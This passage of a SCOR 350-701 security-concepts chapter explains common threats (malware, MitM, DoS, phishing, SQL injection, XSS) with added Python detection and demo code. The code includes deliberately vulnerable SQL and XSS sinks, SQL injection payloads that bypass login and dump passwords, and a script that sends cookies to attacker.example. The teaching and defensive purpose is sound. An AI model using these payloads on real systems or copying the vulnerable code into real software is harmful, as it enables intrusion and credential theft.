
Security Concepts

In this sample chapter, you will learn the fundamental concepts of common threats against on-premises and cloud environments, and the impact that moving to the cloud has on your security threat model. You will also learn about data breaches, insecure APIs, DoS and DDoS attacks, and VPN types. This chapter covers SCOR 350-701 exam objectives.


This chapter prepares you for exam questions related to the security concepts objectives of the SCOR 350-701 exam. You will learn the fundamental concepts of common threats against on-premises and cloud environments, and how the move of many workloads to the cloud shifts and expands your security threat model.

This chapter also covers data breaches, insecure APIs, denial of service (DoS) and distributed denial of service (DDoS), and compromised credentials. We will also discuss the functions of cryptographic components and look at the various virtual private network (VPN) types.

Explain Common Threats Against On-Premises and Cloud Environments

For over three decades, data assets remained tied to corporate headquarters and data centers. With the advent of cloud computing, co-location, managed hosting, and Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS), the threats to these systems have not been eliminated or reduced. They have simply shifted, and new types of threats have been created. Two risks that are often overlooked are the availability of technical resources and of the expertise to support these systems. When we are unable to staff well-trained people capable of identifying, mitigating, responding to, and recovering from attacks, we are at higher risk of threats being missed and of attackers impacting operations.

Common Threats Against On-Premises Assets

Common on-premises threats include viruses, Trojans, DoS/DDoS attacks, phishing, rootkits, MitM attacks, SQL injection, cross-site scripting, and malware.

When defending on-premises assets from threats, we must first have a good accounting of what those assets consist of, which ranges from software, firmware, hardware, and systems to operating system (OS) versions, patches, and each asset's exposure to threats. The three most common assets for any company are:

  • First and foremost, employees are the number-one asset. Without them, there is no innovation, product, or sales.

  • Second is data, which contains company proprietary information. Understand that data drives business operations.

  • Third is the systems themselves, their ability to provide service, and their availability (that they are online and ready to use when needed).

Table 1-1 provides an overview of these three assets and some of their threats and mitigations.

TABLE 1-1 Assets and Threats

Assets               Threats                                         Mitigations
Employees            Phishing, malware, viruses, ransomware          Security awareness and training programs
Data, trade secrets  Ransomware, corruption, deletion, exfiltration  Offline/offsite backups, data leak prevention (DLP)
Systems, compute     Malware, OS and firmware attacks, DDoS          Updates, patches

Let’s take a closer look at the first asset—people. Protecting employees from cyber criminals and potential workplace hazards, such as a hacker gaining control of a power generation plant or water supply, is necessary. While employees can be a company’s greatest asset, they can also be its weakest link.

Employees can be social-engineered or phished, have their endpoints infected with a virus, or download ransomware, malware, or other Trojans that could compromise employee personal data as well as spread to and affect the corporate network. Securing employees should be one of a company's top priorities. Employee awareness programs, monthly awareness newsletters, quarterly training, and biannual training and certification programs can help reduce the negative impacts. Some companies hire outside firms to run simulated phishing campaigns that try to trick users and then warn those who clicked that they could have been compromised. Employees can also be insider threats: an employee who is angry or unhappy with their position or pay could sabotage systems or sell intellectual property.

Another highly valuable asset is the company's data. Data often holds the company's customer records, product information, research, and trade secrets. Attackers could be looking to steal the data to resell it, corrupt the data to harm the business, or encrypt it (ransomware) and hold the organization hostage. Data is what drives business decisions and gives an organization a potential advantage over its competition.

Finally, the systems themselves that serve up the data can be a target. Attackers can attack the operating system, modify firmware, set up man-in-the-middle attacks, perform code or SQL injection, and exploit coding errors that lead to scripting vulnerabilities. Once an attacker has access to the underlying host (operating system or applications), they can degrade performance, steal data, redirect data flows, and make the system unavailable. The various types of attackers are summarized in Table 1-2 along with their capabilities and motivations.

TABLE 1-2 Attacker Types, Capabilities, and Motivations

Hacker Type         Capabilities/Motivations
Black hat           Motivated by money, revenge, or notoriety; wants to sabotage and do harm to systems.
White hat           Generally the good actor: finds vulnerabilities and reports them so they can be fixed.
Gray hat            An explorer who may engage in questionable activity or may have done borderline bad things; typically driven by "what if" discovery.
State sponsored     Government-sanctioned hackers, or hackers hired to attack other governments.
Hacktivist          Hacks and leaks data in the name of a cause.
Cyber terrorist     Seeks to cause maximum harm to an organization; usually tied to publicity.
Suicide hacker      Knows they will get caught, wants to cause damage, and accepts the consequences.
Script kiddie       No real skills; points and clicks, using the tools and scripts of others.
Physical attacker   Has physical access to systems and wants to cause damage.

The most advanced attackers are nation-state actors and organized crime. With large budgets and deep resources, they tend to be formidable adversaries. Defending against attackers generally requires understanding their motivation; Table 1-2 lists the most common types, and this context will best position you to stop them when you encounter them in the wild. Nation-states usually target governments, utilities, and businesses with the intent to disrupt capabilities, steal trade secrets, or extort money.

Another on-premises threat is keyloggers, which can be software or hardware based and can be used on any device, such as a PC, server, tablet, or phone. Keyloggers are used to monitor all keystrokes and send them off the system via a covert channel. This way, attackers can obtain your passwords and much more.

Before we get into malware, viruses, Trojans, and vulnerabilities, let’s review some terms:

  • Threat: Any potential danger to an asset, such as theft, fire, water, natural disaster, an attacker, and so on.

  • Vulnerability: A weakness in a system, system design, or its implementation. Can be in hardware and software. No software or hardware is immune to vulnerabilities.

  • Exploit: A script, code, or tool that takes advantage of a vulnerability. A successful exploit typically gives the attacker access or some other unauthorized capability on the target.

Threats come in many shapes, sizes, and delivery methods. Someone can steal your computing device, such as your laptop or phone, or just the data on your systems. Your data center can be exposed to a fire, flood, or other natural disaster.

Vulnerabilities can be defined as a weakness in hardware, firmware, or software, and they can be the result of a misconfiguration or a system design flaw. To identify vulnerabilities consistently, MITRE developed the Common Vulnerabilities and Exposures (CVE) program. Each CVE identifier consists of the prefix, the year the ID was reserved or published, and a sequence number, such as CVE-2023-1234. This allows everyone to refer to the same issue by the same name.

As defined previously, an exploit is a script, code, or tool, much like a recipe, designed to take advantage of a weakness in firmware, an OS, a software package, or a system. Exploits generally lead to privilege escalation, loss of integrity, or denial of service. A collection of exploits built into a tool is called an attack framework; examples include Metasploit, Cobalt Strike, and Immunity Canvas. Professionals use these tools to find weaknesses and then help an organization defend against them, whereas attackers use them to carry out automated, widespread attacks with a single click. Table 1-3 examines the types of attacks and their effects.

TABLE 1-3 Types of Attacks

Malware
  Virus: A malicious program that, when executed, inserts its own code into other programs and replicates itself. A virus is designed to spread.
  Trojan: A malicious program posing as a useful program that, when executed, creates backdoors for attackers to access the system(s).
  Ransomware: Malicious script or code that lets an attacker execute unauthorized actions on a victim's system and lock the victim out of their data by encrypting it. The attackers demand a ransom for the decryption key.

Denial of service (DoS)
  Direct: The attacker generates packets sent to the victim or target system to overload it and deny legitimate users access.
  Reflected: The attacker spoofs the victim's address as the source so that unwitting third-party systems send their replies to the victim, which then appears to originate the traffic.
  Amplification: A reflected attack in which the response is larger than the request, such as a DNS query whose response is many times the size of the initial query.
  Botnet DDoS: Many compromised ("zombie") systems make up a botnet under the control of the attacker, who directs all of them to send traffic to the target.

Phishing
  Email attack: Emails purporting to be from a reputable company in order to induce an individual to expose their data or system to an attacker.

Rootkit
  Low-level system attack: Infects at a low level in order to manipulate the information the system reports about itself and stay hidden.

Man-in-the-middle (MitM) attack, also known as an on-path attack
  Attacker sits between the victim and the destination: On-path attacks are hard to detect and give the attacker the ability to read and inject data into the stream.

SQL injection
  Direct insertion of code into user-input variables that are concatenated with SQL commands and executed. The injection works by prematurely terminating a text string and appending a new command.

Cross-site scripting (XSS)
  Attackers or malicious users manipulate a website or web application into returning malicious JavaScript to users. When that JavaScript executes in the user's browser, it can record all of the user's interactions with the site.

Viruses and worms are scripts or program code built to exploit a weakness in a system. Since the dawn of personal computers in the mid-1980s there have been viruses, and in 1988 the infamous Morris Worm spread across the Internet. The characteristic that distinguishes a virus is that it requires human interaction, such as opening an email attachment, accessing a file, or clicking an executable, to start the infection; a worm, by contrast, propagates on its own by scanning the network for vulnerable systems. All viruses contain search, infection, and payload routines. The search routine locates new places to infect: files, RAM, and available disk space. The infection routine then multiplies the virus by attaching it to any vulnerable items found. Finally, the payload, which is designed to do harm such as altering, encrypting, or deleting files or exfiltrating data, is executed. Modern viruses steal or exfiltrate files and data or delete files to cause disruption, and ransomware variants encrypt files and hold the data hostage until the victim pays for the decryption key. Viruses propagate by infecting files, the computer's master boot record (MBR), and document macros, and across the network by scanning for vulnerable systems to spread to. More advanced viruses have anti-detection stealth capabilities: they may detect that they are running in a virtual machine or sandbox and stay dormant, disable antivirus software, or suppress the operating system's indications that malware is present.

Malware is a catch-all term for any software designed to cause harm. Examples include viruses, Trojans, spyware, adware, and ransomware. Malware authors obfuscate their programs to avoid detection by security controls for as long as possible. There are many different infection and payload techniques. Profiling and search routines look for new files to infect and determine whether the system is "infection worthy" by checking available RAM and disk space. A second component of the malware is the infection routine, which copies the code to other files and systems. The payload can mean different things: it can be a routine that erases the entire disk, one that generates pop-ups to get the user to click them, or one that uses the address book in the user's email application to propagate the malware to their contacts.

Trojans are typically programs that appear to do one thing but instead do something quite different, typically a malicious act. Some "Trojaned" PDF and Word documents drop files to the target's hard disk and set up a method to auto-load other programs. A remote access Trojan (RAT) is one such program and is used to gain full control of a system. Click-fraud Trojans are fed lists of sites to visit and make money for the fraudster by causing infected computers to visit specific pages carrying ads. Data-hiding Trojans hide themselves and user data from view. E-banking Trojans intercept and use the victim's banking information for financial gain. DoS, FTP, and proxy Trojans allow attackers to use the victim's computer to attack other systems.

Spyware monitors the system’s usage, such as the websites you browse, files you work on, calls you make, text messages you send, photos you take, programs you run, and games you play. Consider it surveillance. This information is sent to various third parties such as criminals, marketing companies, nation-states, law enforcement, and others. This information can then be used to market directly to you, cause pop-ups and hijack and redirect your browser to specific sites, or to steal your data and photos. Reporters have seen this done to them by nation-states that use the collected data to intimidate and silence opposition.

Distribution of viruses and malware is often done via a wrapper (also known as a binder or packager) used to avoid detection by antivirus software. It combines two or more executables into a single packaged program, making it harder to discern the program's intent. For example, you could download a game from an untrustworthy website; the game or its packer would be the Trojan, and when it's executed it launches a second program (a virus), which starts performing its nefarious actions. Packers, which can be custom or off the shelf, compress and obfuscate the code so that antivirus software cannot read it; even ordinary archive tools such as WinRAR, WinZip, and tar are used to wrap payloads for the same reason. The idea is to prevent inspection of the code's true intent until it is unpacked in memory.

Crypters are specifically designed packers with the sole purpose of encrypting and obscuring the malware code to avoid detection. More advanced crypters use advanced algorithms such as AES and Blowfish. Crypters are becoming a more common way to avoid detection by antivirus and intrusion detection systems (IDSs).
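Because packers and crypters compress or encrypt the payload, the packed portion of a file has a byte distribution close to random, which defenders measure as Shannon entropy. The following is an added example, not code from the chapter, that computes per-window entropy over a file image and flags any window above an assumed threshold of 7.2 bits per byte; the sample inputs are constructed (a repeated plain-text snippet, a blob containing every byte value equally often, and a stub that carries such a blob behind a short plain header), not real malware.

```python
import math
from collections import Counter

# Assumed heuristic (not a value from the chapter): compressed or encrypted
# data usually measures above ~7.2 bits per byte, plain code and text well below.
PACKED_ENTROPY_THRESHOLD = 7.2
WINDOW = 256  # bytes per window; assumed


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of data in bits per byte, from 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


def window_entropies(blob: bytes, window: int = WINDOW) -> list[tuple[int, float]]:
    """Entropy of each fixed-size window of the blob, as (offset, entropy) pairs."""
    return [(off, shannon_entropy(blob[off:off + window]))
            for off in range(0, len(blob), window)]


def packed_regions(blob: bytes, window: int = WINDOW) -> list[int]:
    """Offsets of the windows whose entropy suggests packed or encrypted content."""
    return [off for off, ent in window_entropies(blob, window)
            if ent >= PACKED_ENTROPY_THRESHOLD]


def looks_packed(blob: bytes, window: int = WINDOW) -> bool:
    return bool(packed_regions(blob, window))


# Constructed inputs (not real malware): a repeated plain-text snippet standing
# in for unpacked code, and a blob in which every byte value occurs equally
# often, which is what a well-mixed encrypted payload looks like statistically.
PLAIN_SAMPLE = b'int main(void) { puts("hello"); return 0; }\n' * 16
CRYPTED_SAMPLE = bytes(range(256)) * 4
# A stub that carries the encrypted blob after a short plain-text header,
# the layout a crypter produces.
STUB_SAMPLE = PLAIN_SAMPLE[:128] + CRYPTED_SAMPLE

if __name__ == "__main__":
    for name, blob in (("plain", PLAIN_SAMPLE), ("crypted", CRYPTED_SAMPLE), ("stub", STUB_SAMPLE)):
        print(f"{name:8s} entropy={shannon_entropy(blob):.2f} packed_at={packed_regions(blob)}")
```

A window shorter than 256 bytes cannot reach 8 bits (128 distinct bytes cap at exactly 7.0), so the trailing partial window of the stub is not flagged even though it is part of the encrypted blob; real scanners align windows to section boundaries or use a threshold that scales with window size.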

Droppers are single-purposed software designed to install malware on the victim’s system. They utilize a host of complex antidetection techniques to avoid discovery and evade security controls.

Rootkits are a favored tool of advanced persistent threat (APT) actors. They typically hide at a very low level on a device, such as the boot sector or kernel drivers, and remain quiet in the background, intercepting and altering operating system calls so that they stay hidden and can exfiltrate data unseen. A rootkit filters what the system reports about itself, removing anything associated with the rootkit so that the system looks normal. After a rootkit infects a device, you cannot trust any information the device reports about itself, and a complete rebuild is generally required.

Man-in-the-middle attacks can use many different techniques; we will discuss a few here. The first is IP spoofing. Every device on a network has an IP address and a MAC address, and by impersonating another device's address an attacker can cause traffic to be delivered to their own machine first and then forward it on, so that the victim is unaware of the interception. On a local network this is typically done via ARP poisoning. Here are some other techniques used for MitM attacks:

  • ARP spoofing is where the attacker sends forged ARP replies so that other hosts map the gateway's IP address (or a victim's) to the attacker's MAC address, pointing their traffic at the attacker.

  • Session hijacking (or cookie theft) happens when the attacker sits between a system and a web resource and collects cookies and tokens and then replays them on certain websites so they look like the original connection. This allows the attacker to gain access to your email, banking website, and more.

  • DNS spoofing or DNS cache poisoning is where the attacker corrupts the Domain Name System’s resolver cache function, thus diverting the user to the attacker’s website.

  • Wi-Fi eavesdropping is where the attacker creates a twin network, and because of its proximity and signal strength, the victim connects to the attacker’s fake network, allowing the attacker to intercept all traffic, messages, passwords, and more.

  • SSL stripping involves the attacker downgrading the communication between the client and the server to an unencrypted format in order to intercept cleartext traffic. The user may notice that the lock icon is missing from the address bar and that the page is loading over plain HTTP. The SSLstrip tool, created by Moxie Marlinspike, demonstrates the attack: it intercepts web traffic, and when it encounters an HTTPS URL in a server response it replaces it with an HTTP link and keeps a mapping of the change so that it can hold the HTTPS side of the connection itself. HTTP Strict Transport Security (HSTS), especially with browser preloading, defeats this downgrade for sites that deploy it.
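The following added example, which is not part of the chapter, shows the detection logic a network monitor applies against the ARP spoofing described above: it walks a constructed log of ARP replies and alerts when an IP address already bound to one MAC address is announced with a different one, escalating when the affected IP is the gateway, and when a single MAC claims several IP addresses. The gateway address, the MAC values, and the log itself are constructed for the illustration.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.1.1"  # assumed lab gateway address (constructed)

# Constructed log of ARP replies seen on the segment: (seconds, sender_ip,
# sender_mac, target_ip). Not a real capture. The attacker's interface is
# aa:bb:cc:dd:ee:ff; it claims the gateway's IP toward the victim and the
# victim's IP toward the gateway, the classic two-sided ARP poison.
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "00:11:22:33:44:55", "192.168.1.20"),  # real gateway
    (0.5, "192.168.1.20", "00:11:22:aa:bb:20", "192.168.1.1"),   # real victim
    (1.0, "192.168.1.1",  "aa:bb:cc:dd:ee:ff", "192.168.1.20"),  # poison toward victim
    (1.1, "192.168.1.20", "aa:bb:cc:dd:ee:ff", "192.168.1.1"),   # poison toward gateway
    (1.2, "192.168.1.1",  "aa:bb:cc:dd:ee:ff", "192.168.1.21"),  # poison toward another host
    (2.0, "192.168.1.30", "00:11:22:aa:bb:30", "192.168.1.1"),   # unrelated, legitimate
]


def detect_arp_spoofing(replies, trusted=None):
    """
    Return alert strings for the ARP replies in `replies`.

    The first MAC seen for an IP (or one seeded through `trusted`) is kept as
    the reference binding; a later reply announcing the same IP with a
    different MAC is reported, as CRITICAL when the IP is the gateway. A single
    MAC that claims more than one IP is reported as a likely poisoner.
    """
    ip_to_mac = dict(trusted or {})
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, sender_ip, sender_mac, _target_ip in replies:
        mac_to_ips[sender_mac].add(sender_ip)
        reference = ip_to_mac.get(sender_ip)
        if reference is None:
            ip_to_mac[sender_ip] = sender_mac
        elif reference != sender_mac:
            severity = "CRITICAL" if sender_ip == GATEWAY_IP else "WARNING"
            alerts.append(f"{severity} t={ts:.1f}: {sender_ip} moved from "
                          f"{reference} to {sender_mac}")
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(f"WARNING: {mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoofing(ARP_REPLIES, trusted={GATEWAY_IP: "00:11:22:33:44:55"}):
        print(line)
```

Seeding `trusted` with the gateway's real MAC matters in production: a monitor that starts after the attacker has begun poisoning would otherwise learn the attacker's MAC as the reference binding and stay silent.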

In Table 1-4, we examine the attack methods, activity types, and results of the attack.

TABLE 1-4 MitM Attack Methods

IP spoofing
  Attack activity: Spoofing the IP and MAC addresses
  Attack results: Forged ARP replies bind the gateway's (or another host's) IP address to the attacker's MAC address, so hosts send their traffic to the attacker first.

DNS spoofing
  Attack activity: Poisoning the DNS resolver cache
  Attack results: Corrupts Domain Name System data and introduces incorrect results that send the victim to the attacker's site.

Wi-Fi eavesdropping
  Attack activity: Creating a fake (evil twin) access point
  Attack results: The attacker creates a twin network that the victim connects to, allowing the interception of all traffic.

SSL stripping/hijacking
  Attack activity: Downgrading the connection from HTTPS to HTTP
  Attack results: The attacker intercepts the HTTPS traffic and strips the "S," leaving the victim on a cleartext HTTP connection.

Browser cookie theft
  Attack activity: Hijacking a session
  Attack results: The attacker collects the cookies ("tokens") the user sends over the network and then replays them to impersonate the user to the server.

Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks are designed to disrupt, disable, and deny service to legitimate users of a system or program. They do this by flooding a network or system with requests or crafted network traffic. A classic method is the ICMP (ping) flood, where many hosts send ICMP echo requests to a single host, overwhelming it and depleting its available resources (RAM, network bandwidth, and CPU); SYN floods and the UDP-based amplification attacks listed in Table 1-3 are typical of modern volumetric attacks. DoS attacks typically come from a single source, whereas DDoS attacks involve many machines attacking a single target. They can be launched either from the local network or externally through a command and control (C2) network such as a botnet.
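As an added example, not from the chapter, the code below implements the simple sliding-window detector a network sensor would run over flow records: it counts ICMP echo requests per destination in a one-second window and, once a threshold is crossed, labels the event DoS when the traffic comes from a single source and DDoS when it comes from many. The thresholds, the addresses (from the RFC 5737 documentation ranges), and the record format are assumptions for the demonstration; the traffic itself is constructed.

```python
from collections import defaultdict, deque

# Assumed detection parameters, not values from the chapter.
WINDOW_SECONDS = 1.0          # sliding window per destination
PACKET_THRESHOLD = 50         # echo requests per window before we call it a flood
DDOS_SOURCE_THRESHOLD = 10    # distinct sources before we call the flood distributed


def flood_events(records):
    """
    records: iterable of (timestamp, src_ip, dst_ip, proto) sorted by timestamp.
    Returns {dst_ip: (kind, peak_packets, distinct_sources)} for each destination
    whose ICMP echo count inside WINDOW_SECONDS reached PACKET_THRESHOLD, where
    kind is "DDoS" when the packets came from DDOS_SOURCE_THRESHOLD or more
    sources and "DoS" otherwise. Other protocols are ignored here.
    """
    windows = defaultdict(deque)   # dst_ip -> deque of (ts, src_ip) inside the window
    verdicts = {}
    for ts, src, dst, proto in records:
        if proto != "icmp-echo":
            continue
        q = windows[dst]
        q.append((ts, src))
        while ts - q[0][0] > WINDOW_SECONDS:   # expire packets that fell out of the window
            q.popleft()
        if len(q) >= PACKET_THRESHOLD:
            sources = {s for _, s in q}
            kind = "DDoS" if len(sources) >= DDOS_SOURCE_THRESHOLD else "DoS"
            previous = verdicts.get(dst)
            if previous is None or len(q) > previous[1]:
                verdicts[dst] = (kind, len(q), len(sources))
    return verdicts


def synth_burst(dst, n_sources, n_packets, start, spread=0.5):
    """Construct n_packets echo requests to dst from n_sources hosts within `spread` seconds."""
    return [(start + i * spread / n_packets, f"198.51.100.{(i % n_sources) + 1}", dst, "icmp-echo")
            for i in range(n_packets)]


# Constructed traffic sample (RFC 5737 documentation addresses), not a real capture.
SAMPLE_RECORDS = (
    synth_burst("192.0.2.10", n_sources=1, n_packets=200, start=0.0)      # one attacker: DoS
    + synth_burst("192.0.2.20", n_sources=100, n_packets=300, start=5.0)  # botnet: DDoS
    + [(10.0, "198.51.100.9", "192.0.2.30", "icmp-echo"),                  # ordinary pings
       (10.2, "198.51.100.9", "192.0.2.30", "tcp"),
       (11.0, "198.51.100.9", "192.0.2.30", "icmp-echo")]
)

if __name__ == "__main__":
    for dst, (kind, peak, sources) in flood_events(SAMPLE_RECORDS).items():
        print(f"{dst}: {kind}, peak {peak} echo requests/window from {sources} source(s)")
```

Because reflected and amplified attacks arrive from spoofed or third-party addresses, the distinct-source count alone cannot tell a botnet from a reflector pool; in practice the verdict is combined with the protocol mix and the request/response size ratio.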

Phishing attacks are generally designed to trick a user into interacting with an email. This can allow the attacker to steal sensitive user data such as login credentials and passwords in order to get a foothold on the victim’s network/systems. This attack is a social engineering attack and is most often achieved through email. Many of these emails are spoofed and meant to look like something the user would trust, basically tricking the user into doing something that is harmful to their organization or themselves.
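The following added example, not code from the chapter, applies a few of the header and body checks a mail gateway uses to flag the spoofed messages described above: mismatches between the From domain and the Reply-To or Return-Path domains, failed or missing SPF/DKIM results in the Authentication-Results header, and links whose visible text names a different host than the href points to. The two messages are constructed for the illustration and use reserved example domains.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser

AUTH_FAILURE = re.compile(r"\b(?:spf|dkim|dmarc)=(?:fail|softfail|none)\b", re.I)


def _domain(address: str) -> str:
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def _host(url_or_text: str) -> str:
    """Host part of a URL or URL-looking text, without scheme or path."""
    stripped = re.sub(r"^[a-z][a-z0-9+.-]*://", "", url_or_text.strip(), flags=re.I)
    return stripped.split("/")[0].lower()


class _LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs from <a> elements."""
    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def phishing_indicators(raw: bytes) -> list[str]:
    """Return human-readable findings for one raw message; an empty list means nothing tripped."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    from_domain = _domain(parseaddr(str(msg.get("From", "")))[1])
    for header in ("Reply-To", "Return-Path"):
        address = parseaddr(str(msg.get(header, "")))[1]
        if address and _domain(address) != from_domain:
            findings.append(f"{header} domain {_domain(address)} differs from From domain {from_domain}")
    for match in AUTH_FAILURE.finditer(str(msg.get("Authentication-Results", ""))):
        findings.append(f"Authentication-Results reports {match.group(0)}")
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is not None:
        collector = _LinkCollector()
        collector.feed(html_part.get_content())
        for href, text in collector.links:
            if "." in _host(text) and _host(text) != _host(href):
                findings.append(f"link text shows {_host(text)} but points to {_host(href)}")
    return findings


# Constructed messages on reserved example domains; not real mail.
PHISH = b"""From: "Example Bank Security" <alerts@examp1e-bank.example>
Reply-To: <support@mail-relay.example.net>
Return-Path: <bounce@mail-relay.example.net>
Authentication-Results: mx.example.org; spf=fail smtp.mailfrom=mail-relay.example.net; dkim=none
To: victim@example.org
Subject: Urgent: verify your account
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Your account is locked. Sign in within 24 hours:</p>
<a href="http://login.examp1e-bank.example/verify">https://www.example-bank.example/login</a>
</body></html>
"""

CLEAN = b"""From: IT Helpdesk <helpdesk@example.org>
To: victim@example.org
Subject: Maintenance window
Authentication-Results: mx.example.org; spf=pass; dkim=pass
Content-Type: text/plain; charset="utf-8"

All servers reboot Saturday at 02:00 UTC.
"""

if __name__ == "__main__":
    for finding in phishing_indicators(PHISH):
        print("PHISH:", finding)
    print("CLEAN:", phishing_indicators(CLEAN) or "no indicators")
```

None of these checks is decisive on its own (legitimate bulk mail often sets a different Return-Path), which is why gateways score indicators rather than block on any single one.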

SQL injection is an attack in which malicious code is inserted into strings that are later passed to a SQL database for parsing and execution. Any procedure that constructs SQL statements from input should be reviewed for injection vulnerabilities, because the database server will execute every syntactically valid query it receives. Parameterized queries are the primary defense, but even parameterized input can be abused if it is later concatenated into dynamic SQL, for example inside a stored procedure.

The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and then executed. A less-direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed. The injection process works by prematurely terminating a text string and appending a new command. Because the inserted command may have additional strings appended to it before it is executed, the attacker can string commands together.

SQL is a well-known standard language used for accessing and interacting with databases. As previously mentioned, SQL injections specifically attack database resources, usually through web applications. If a backend SQL database has a vulnerability or was not set up securely, an attacker can make specially crafted requests to trick, for example, a web login form. Instead of logging in, the injection can request data from the database, such as usernames and passwords, private data, or it can interact and modify the data. There are three types of SQL injections, as described in the following list:

  • In-band SQL injection: The requested data is visible directly on the response web application or web page, allowing the attacker to copy the page off to their system.

  • Out-of-band SQL injection: The attacker performs a specially crafted request, and the data is transmitted via an email or inside a file. The data is sent to the attacker’s system or a C2 collector, ultimately ending up with the attacker.

  • Blind SQL injection: The attacker crafts many special requests to elicit responses from the database and learn more about it. Even if the database does not display data back, each response (an error message, a difference in page content, or a timing delay) can lead the attacker to understand the structure of the database and its type, version, or vendor.
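The following added example is not from the chapter. It uses an in-memory SQLite database to show the two patterns the text describes: a login query built by string concatenation, which an attacker bypasses with a comment-terminated username and which leaks the whole table through an in-band UNION injection, alongside the same queries written with bound parameters, which treat the payload as data. The table, the accounts, the passwords, and the payloads are constructed, and the vulnerable functions keep the flaw on purpose.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed demo database (not from the chapter): two accounts in an in-memory SQLite file."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "S3cret!", "admin"),
        ("alice", "wonderland", "user"),
    ])
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Deliberately vulnerable: input is concatenated straight into the SQL text."""
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username: str, password: str):
    """Hardened: the same query with bound parameters; input can never change the SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def list_by_role_vulnerable(conn, role: str):
    """Deliberately vulnerable lookup used for the in-band UNION injection below."""
    return conn.execute(f"SELECT username, role FROM users WHERE role = '{role}'").fetchall()


def list_by_role_parameterized(conn, role: str):
    return conn.execute("SELECT username, role FROM users WHERE role = ?", (role,)).fetchall()


# Constructed payloads. The first closes the username literal and comments out
# the rest of the WHERE clause ("--" starts a comment in SQLite), so the password
# check disappears. The second closes the literal and appends a UNION that pulls
# every password out of the table into the response: in-band injection.
AUTH_BYPASS = "admin'--"
UNION_DUMP = "nosuchrole' UNION SELECT username, password FROM users--"

if __name__ == "__main__":
    conn = make_demo_db()
    print("vulnerable login with", repr(AUTH_BYPASS), "->", login_vulnerable(conn, AUTH_BYPASS, "wrong"))
    print("parameterized login     ->", login_parameterized(conn, AUTH_BYPASS, "wrong"))
    print("vulnerable role lookup  ->", list_by_role_vulnerable(conn, UNION_DUMP))
    print("parameterized lookup    ->", list_by_role_parameterized(conn, UNION_DUMP))
```

With parameters bound, the database looks for a user literally named `admin'--` and a role literally named `nosuchrole' UNION SELECT ...`, and finds neither; the quote never terminates the string because it is never part of the SQL text.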

Cross-site scripting (XSS) attacks come in three types. Cross-site scripting occurs when attackers or malicious users can manipulate a website or web application to return malicious JavaScript to users. When this malicious JavaScript is executed in the user’s browser, all the user’s interactions with the site (including but not limited to authentication and payment) can be compromised by the attacker.

DOM-based XSS is a type of cross-site scripting that occurs when user input is manipulated in an unsafe way in the DOM (Document Object Model) by JavaScript. For example, this can occur if you were to read a value from a form and then use JavaScript to write it back out to the DOM.

Reflected XSS occurs when the web server receives an HTTP request and “reflects” information from the request back into the response in an unsafe manner. An example would be when the server places the requested application route/URL in the page that is served back to the user. An attacker can construct a URL with a malicious route that contains JavaScript, such that if a user visits the link, the script will execute.

Stored XSS occurs when user-created data is stored in a database or other persistent storage and is then loaded into a page. Common examples of types of applications that do this include comment areas, forums, response plug-ins, and similar applications. Stored XSS is particularly dangerous when the stored content is displayed to many or all users of the application, because then one user can compromise the site for any user who visits it, without requiring that they click a specific link.
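As an added example, not the chapter's own code, the following shows a reflected-XSS sink and its fix: a page fragment that reflects a search query raw, the same fragment with contextual HTML escaping, and a link-rendering helper for a stored profile field that also restricts the URL scheme, because escaping alone does not stop a `javascript:` URL placed in an href attribute. The payload and the field names are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed payload: exfiltrates the session cookie to an attacker host.
XSS_PAYLOAD = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"


def render_search_vulnerable(query: str) -> str:
    """Reflected XSS sink: the query string is copied into the page unchanged."""
    return f"<p>Results for: {query}</p>"


def render_search_safe(query: str) -> str:
    """Same fragment with output encoding for an HTML text context."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


SAFE_SCHEMES = {"http", "https", "mailto"}


def safe_href(url: str) -> str:
    """
    Output encoding for an href attribute. Escaping alone is not enough here:
    html.escape("javascript:alert(1)") is unchanged and still executes when
    clicked, so the scheme is checked against an allowlist first. Browsers
    drop ASCII tab and newline inside URLs, so those are removed before
    parsing to defeat "java\\tscript:" style evasion.
    """
    cleaned = "".join(ch for ch in url if ch not in "\t\r\n").strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        return "#"
    return html.escape(cleaned, quote=True)


def render_profile_link(display_name: str, homepage: str) -> str:
    """Stored profile fields rendered with both protections applied."""
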